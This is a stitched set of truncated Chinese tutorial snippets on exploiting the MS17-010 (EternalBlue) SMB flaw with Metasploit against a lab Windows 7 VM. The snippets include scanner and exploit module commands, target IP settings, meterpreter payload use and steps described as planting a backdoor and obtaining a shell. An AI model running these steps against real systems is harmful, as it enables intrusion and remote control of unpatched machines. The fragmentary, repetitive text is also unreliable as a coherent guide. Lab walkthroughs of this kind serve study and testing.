进行渗透攻击 输入back命令返回msf5命令行 1.利用攻击模块 命令:use exploit/windows/smb/ms17_010_eternalblue 2.配置攻击模块 命令:options 命令:set rhost 192.168.48.129 3.发起攻击 命令:run 4.尝试获取在攻击机上获取靶机ip地址 植入后门 输入back命令返回 1.使用meterpreter模块 代码语言:javascript 复制 set...
一、 准备工作(两台虚拟机需要在同一网段下,将网络配置设置为桥接模式即可)。 1.win7旗舰版sp1(靶机) 2.kali (攻击机) 二、 1.查看攻击机和靶机的IP 2.在kali里用msfconsole命令运行MSF (奇奇怪怪的图案还挺别致) 3.使用命令search ms17_010,会显示相关的模块 4.我们选择第一个,输入use exploit/window...
msfconsole 进入metasploit框架5|03.搜询永恒之蓝漏洞search ms17-010 6|04.使用辅助模块(非必要)查看漏洞所需要配置。扫描存在此漏洞的主机,或判断指定主机是否存在该漏洞。1.使用辅助模块 use auxiliary/scanner/smb/smb_ms17_010 2.查看漏洞需要的配置 show options 可见该漏洞是需要主机开放445端口,且利用的是...
smb(ms17-010)远程命令执行之msf 本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 具体的步骤如下: kali系统下安装wine32: apt-get install wine32 1. === 若kali为64位 windows为32 需要安装wine32 ,但64位的kali下无法apt-ge...
Kali终端输入msfconsole,启动msfconsole;如下图,启动画面每次都不一样 图像不一样不用担心 先查找一下永恒之蓝的攻击模块: 使用命令 search eternalblue 使用该攻击模块: 命令:use exploit/windows/smb/ms17_010_eternalblue , 使用这个模块,我们show targets看一下这个模块适用于哪些系统的主机 ...
扫完后我们可以发现存在MS17_010漏洞 进入msfconsole,并搜索这个漏洞: 其中前2个插件是auxiliary目录下的,属于辅助验证程序。 2到4是exploit目录下的,这才是我们重点研究的对象。(第3个在本章暂且用不上) 这里就拿auxiliary/scanner/smb/smb_ms17_010这个扫描插件来测试。
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
使用MSF对MS17-010的利用演示 过程: 1、扫描: 信息搜集(刺探) 2、漏洞利用 一、首先检测网段内存在漏洞的主机系统: 使用命令: msf > use auxiliary/scanner/smb/smb_ms17_010 //加载扫描exp msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 //配置扫描网段 msf auxiliary(scanner/...
//搜索ms17-010关键字,可以找到两个工具。第一个是检测是否存在漏洞工具,第二个是入侵工具 msf>use auxiliary/scanner/smb/smb_ms17_010 1. msf auxiliary(smb_ms17_010)>setrhosts192.168.1.102 //设置目标主机IP地址 1. rhosts => 192.168.1.102 ...
二、kali机运行MSF: 命令:msfconsole 三、查找漏洞利用模块: 四、使用模块,并设置目标信息及payload(有效载荷): payload:可理解为要上传的木马。 设置TCP连接方式 五、使用模块进行攻击: 查看有效载荷提供的可执行命令: 部分截图 例:获取目标主机shell